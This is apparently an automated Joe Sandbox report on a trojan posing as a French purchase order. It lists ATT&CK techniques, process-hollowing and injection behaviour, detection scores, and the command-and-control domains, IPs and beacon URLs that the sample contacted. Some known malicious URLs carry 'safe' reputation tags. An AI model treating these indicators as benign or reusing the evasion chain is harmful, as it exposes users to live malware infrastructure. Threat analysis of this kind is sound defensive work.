          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information5Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458861 Sample: Nouveau bon de commande. 30... Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 36 www.signin-solution.com 2->36 38 www.travelawardsguide.com 2->38 40 2 other IPs or domains 2->40 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 6 other signatures 2->50 11 Nouveau bon de commande. 3007021_pdf.exe 3 2->11         started        signatures3 process4 file5 28 Nouveau bon de com...3007021_pdf.exe.log, ASCII 11->28 dropped 14 Nouveau bon de commande. 3007021_pdf.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 handybusy.com 162.241.218.97, 49742, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 indiadesignstory.com 160.153.138.219, 49744, 80 GODADDY-AMSDE United States 17->32 34 15 other IPs or domains 17->34 42 System process connects to network (likely due to code injection or exploit) 17->42 21 WWAHost.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Nouveau bon de commande. 3007021_pdf.exe61%VirustotalBrowse
          Nouveau bon de commande. 3007021_pdf.exe43%MetadefenderBrowse
          Nouveau bon de commande. 3007021_pdf.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Nouveau bon de commande. 3007021_pdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          trucktodock.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cnN0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.trucktodock.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC0%Avira URL Cloudsafe
          http://www.theassistedadrscheme.com/ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX0%Avira URL Cloudsafe
          http://travelawardsguide.com/ajs8/?3fBlVXm=SVfnn/RS59BZjQOJq1nGaV1j1LxsdmH7K5f9UuJUxaq5YOiipJWffLZbL0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&amp;3fBlVXm=LEjUMU0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.handybusy.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.trucktodock.com/ajs8/0%Avira URL Cloudsafe
          http://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.shopvybz.com/ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.discountpty.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          theassistedadrscheme.com
          34.102.136.180
          truefalse
            unknown
            trucktodock.com
            34.102.136.180
            truefalseunknown
            www.travelawardsguide.com
            217.160.0.64
            truefalse
              unknown
              indiadesignstory.com
              160.153.138.219
              truetrue
                unknown
                handybusy.com
                162.241.218.97
                truetrue
                  unknown
                  server.domainsconfig.ru
                  193.142.59.163
                  truefalse
                    unknown
                    shops.myshopify.com
                    23.227.38.74
                    truetrue
                      unknown
                      www.comericac.com
                      unknown
                      unknowntrue
                        unknown
                        www.jual-penggugurkandungan.com
                        unknown
                        unknowntrue
                          unknown
                          www.discountpty.com
                          unknown
                          unknowntrue
                            unknown
                            www.mybluemonitor.com
                            unknown
                            unknowntrue
                              unknown
                              www.handybusy.com
                              unknown
                              unknowntrue
                                unknown
                                www.n1getaccess.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.trucktodock.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.theassistedadrscheme.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.signin-solution.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.shopvybz.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.indiadesignstory.com
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.trucktodock.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtCfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.theassistedadrscheme.com/ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKXfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.handybusy.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            www.trucktodock.com/ajs8/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARThtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.shopvybz.com/ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKXtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.discountpty.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1qtrue
                                            • Avira URL Cloud: safe
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.founder.com.cn/cnNNouveau bon de commande. 3007021_pdf.exe, 00000000.00000003.206509028.0000000000FAD000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://travelawardsguide.com/ajs8/?3fBlVXm=SVfnn/RS59BZjQOJq1nGaV1j1LxsdmH7K5f9UuJUxaq5YOiipJWffLZbLWWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.tiro.comexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&amp;3fBlVXm=LEjUMUWWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.goodfont.co.krexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.carterandcone.comlexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.typography.netDexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fonts.comexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                162.241.218.97
                                                                handybusy.comUnited States
                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                23.227.38.74
                                                                shops.myshopify.comCanada
                                                                13335CLOUDFLARENETUStrue
                                                                34.102.136.180
                                                                theassistedadrscheme.comUnited States
                                                                15169GOOGLEUSfalse
                                                                160.153.138.219
                                                                indiadesignstory.comUnited States
                                                                21501GODADDY-AMSDEtrue

                                                                General Information

                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                Analysis ID:458861
                                                                Start date:03.08.2021
                                                                Start time:20:10:19
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 8m 50s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:Nouveau bon de commande. 3007021_pdf.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:26
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/1@12/4
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 65.6% (good quality ratio 61.2%)
                                                                • Quality average: 72%
                                                                • Quality standard deviation: 30.5%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.255.188.83, 20.82.209.183, 23.35.236.56, 40.112.88.60, 20.82.210.154, 80.67.82.211, 80.67.82.235
                                                                • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                20:11:25API Interceptor1x Sleep call for process: Nouveau bon de commande. 3007021_pdf.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                23.227.38.74Purchase Requirements.exeGet hashmaliciousBrowse
                                                                • www.thefitflect.com/n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp
                                                                Form_TT_EUR57,890.exeGet hashmaliciousBrowse
                                                                • www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8
                                                                INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                • www.saletshirtonline.net/vtg0/?2d2hhfX=wLM7yM5qIIdfZe6bPcD5+tH9HS6HIdKxsDGDeiTUWIc3xI5y5L9vfJDJMr8bE3UHW7IY&Uf=Vdm4RdxXY4ad4
                                                                payment copy.exeGet hashmaliciousBrowse
                                                                • www.go-rillathebrand.com/grve/?k4zl7v=+aJGkTYs+v5qwgDAZYrAiqdMmvOKV8L40B89/S9Al34dlMYhgyT3r4n/526+lwfpvND+&LZ=7nAhDZ0Pqxa
                                                                PO_0008.exeGet hashmaliciousBrowse
                                                                • www.miracle-tone.com/usvr/?T4Vtm=qT8HIASLzdvgtPuSqeC+SgFU6QHrW9xLc1n9hn/9kejyrORZzjqAW1EWdwGWEIWNFMmS&mD=3f2XLdWh
                                                                i9Na8iof4G.exeGet hashmaliciousBrowse
                                                                • www.rootmoover.com/wufn/?7n=pDKh8nopV2b0&-ZYx-=jUqWC+wOjrrnf2CQrj52syV+yALdMbb6PeVmesdIWlCxWErNj937WU588MC4hnh1Hp0+ODAGVw==
                                                                bin.exeGet hashmaliciousBrowse
                                                                • www.shoppinkksugar.com/cvrn/?9rSx00op=Iu6dEYykmYBZDVkHqoWf7UFcij5h1gP9UVpQoOFFQSHjdyZzHlZY1xDiEpj6UByo6tZJCBzf0A==&StT=FR-8dxEhSB
                                                                Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                                • www.themummymarketplace.com/fznn/?e0GHc8YP=knTPA+f9tKCZdl8AXg9m87w6tnYHDJqknKET7CvX32Y80YefcE1IwqZdAZ2fl6ctn9k4&9rg=00GTJt
                                                                RYP-210712.xlsxGet hashmaliciousBrowse
                                                                • www.riveraitc.com/6mam/?TP=SnhjisI/g941tYnedO532EwcXneBDaw7KeLS1bDcRf/9DFIScc8FKDp/bNw9aZvGYlrq4Q==&O2M0W=yVJpjpi8601X
                                                                INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                • www.saletshirtonline.net/vtg0/?8pcx=wLM7yM5qIIdfZe6bPcD5+tH9HS6HIdKxsDGDeiTUWIc3xI5y5L9vfJDJMr8xbHkHS5AY&b8Zd=YdoHsDD
                                                                auhToVTQTs.exeGet hashmaliciousBrowse
                                                                • www.essentiallyourscandles.com/p2io/?LhZlTrE=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjoHtKIVmiR&VN=1bQLqD
                                                                Invoice Amount 14980.exeGet hashmaliciousBrowse
                                                                • www.slingmodeinc.com/p4se/?7npd928=D5A61tOYXACBJnTTL6EuJjOFOrzb7pToer6ROMogPofjrPCD8Igj7Qs9clmkcP0LoyCpBDdung==&U2M=m0GHc
                                                                W7f.PDF.exeGet hashmaliciousBrowse
                                                                • www.serenityeternity.com/ushb/?-ZT=4hqHR&3feDA=59BDWT+RfSt3SBSoc1bHtk+fi9zzfb2ZkmW634jeoVZ5ZNJtsds46fXGn58sLk1vYRmK
                                                                Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                                                • www.shopinnocenceeyejai.com/um8e/?oT60=5js4&khX81N=xH37aAVzz87XJyJmDmcM72NNpTFjNoYi38LK6Cm6aAvAgv0ee8djzuC2F/V3G7HCeXQO
                                                                MR# RFx 21-2034021.exeGet hashmaliciousBrowse
                                                                • www.isbpestcontrol.com/wt5i/?gPJtvx=4hQLbd7p5RaTuHV&k6AT-2H=zGMYFR67lDE2HH6Vm1zczZHcFL0qym+4qYTJbpMzh4zr6+Zy1hBqKi2vQzUiwesLouDL
                                                                AWB & Shipping Tracking Details.exeGet hashmaliciousBrowse
                                                                • www.mrbeagleshop.com/iuem/?A48t=Y8eiPa/Nz3UJvAERzDFlMhabbaOL1i+JuDXOTMHO4J5NnUwqavKtuVQDaAM2tTgSlsfk&nN=1bVtlz
                                                                ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.docGet hashmaliciousBrowse
                                                                • www.yummylipz.net/b8eu/?5jLxCj7=BJsIvBSZAMM8O3qnTBySesvKf4cy5ptvtRL/e7MsGjTsJ8iq89FIxm8C2ebAarH9of/FaA==&S48H=-ZSXKLQ8r2B4yP
                                                                Nsda7LTM1x.exeGet hashmaliciousBrowse
                                                                • www.rootmoover.com/wufn/?VFNXjbnp=jUqWC+wOjrrnf2CQrj52syV+yALdMbb6PeVmesdIWlCxWErNj937WU588MO4y3t2e50o&R0GP=g0Dt1dZH_
                                                                ORDER78827.docGet hashmaliciousBrowse
                                                                • www.timelessthots.com/b82a/?bTcT=0bhHK4GPMBVHoFX&R8SL=+W4cVHxaRfYtj0YDCK6op++cHV2wfF4HiTGeqDXvDBZfFEYSHEbLIPAcuPNF3olTRIFT3g==
                                                                D3ccF8FfwAXrqsU.exeGet hashmaliciousBrowse
                                                                • www.themummymarketplace.com/fznn/?0x=knTPA+f9tKCZdl8AXg9m87w6tnYHDJqknKET7CvX32Y80YefcE1IwqZdAaWl1r8V9aF/&S8DhyH=5jU4g2_HxF

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                shops.myshopify.comPurchase Requirements.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Form_TT_EUR57,890.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                payment copy.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                PO_0008.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                i9Na8iof4G.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                bin.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                RYP-210712.xlsxGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                auhToVTQTs.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                kKTeUAtiIP.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Invoice Amount 14980.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                W7f.PDF.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                MR# RFx 21-2034021.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                AWB & Shipping Tracking Details.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.docGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                Nsda7LTM1x.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                ORDER78827.docGet hashmaliciousBrowse
                                                                • 23.227.38.74

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                UNIFIEDLAYER-AS-1USwuxvGLNrxG.jarGet hashmaliciousBrowse
                                                                • 162.241.216.53
                                                                Amaury.vanvinckenroye-AudioMessage_520498.htmGet hashmaliciousBrowse
                                                                • 192.185.138.88
                                                                transferred $95,934.55 pdf.exeGet hashmaliciousBrowse
                                                                • 50.87.146.49
                                                                rL3Wx4zKD4.exeGet hashmaliciousBrowse
                                                                • 74.220.199.6
                                                                hD72Gd3THG.exeGet hashmaliciousBrowse
                                                                • 67.20.76.71
                                                                Products Order38899999.exeGet hashmaliciousBrowse
                                                                • 50.87.146.199
                                                                ORDER_0009_PDF.exeGet hashmaliciousBrowse
                                                                • 74.220.199.6
                                                                WWTLJo3vxn.exeGet hashmaliciousBrowse
                                                                • 192.254.235.241
                                                                INV. 736392 Scan pdf.exeGet hashmaliciousBrowse
                                                                • 192.185.164.148
                                                                7nNtjBvhrmGet hashmaliciousBrowse
                                                                • 142.7.147.90
                                                                Purchase Requirements.exeGet hashmaliciousBrowse
                                                                • 192.185.0.218
                                                                #Ud83d#Udda8 FaxMail dir -INV 000087.htmlGet hashmaliciousBrowse
                                                                • 162.241.217.69
                                                                Products Order.exeGet hashmaliciousBrowse
                                                                • 50.87.146.199
                                                                zerYOlEkZR.exeGet hashmaliciousBrowse
                                                                • 192.254.235.241
                                                                PO-K-128 IAN 340854.exeGet hashmaliciousBrowse
                                                                • 192.185.90.36
                                                                csa customers.xlsxGet hashmaliciousBrowse
                                                                • 162.241.217.138
                                                                ENXcmU1LzQ.exeGet hashmaliciousBrowse
                                                                • 108.167.158.96
                                                                Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                                • 192.185.0.218
                                                                Medical Equipment Order 2021.PDF.exeGet hashmaliciousBrowse
                                                                • 74.220.199.6
                                                                S4M4QpXfnn.exeGet hashmaliciousBrowse
                                                                • 173.254.56.16
                                                                CLOUDFLARENETUSMFS0175, MFS0117 MFS0194.exeGet hashmaliciousBrowse
                                                                • 172.67.188.154
                                                                ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exeGet hashmaliciousBrowse
                                                                • 172.67.176.89
                                                                Purchase Requirements.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                items.docGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                ZI09484474344.exeGet hashmaliciousBrowse
                                                                • 104.21.49.41
                                                                #Ud83d#Udda8rocket.com 7335931#Ufffd90-queue-1675.htmGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                ATT66004.HTMGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                JUP2A9ptp5.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                7vd7MuxjGd.exeGet hashmaliciousBrowse
                                                                • 104.21.92.87
                                                                xar2.dllGet hashmaliciousBrowse
                                                                • 172.67.70.134
                                                                Form_TT_EUR57,890.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
                                                                BadFile.HTMGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                Stolen Images Evidence.jsGet hashmaliciousBrowse
                                                                • 104.21.95.9
                                                                LOPEZ CV.exeGet hashmaliciousBrowse
                                                                • 104.21.19.200
                                                                Stolen Images Evidence.jsGet hashmaliciousBrowse
                                                                • 104.21.95.9
                                                                INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                                • 23.227.38.74
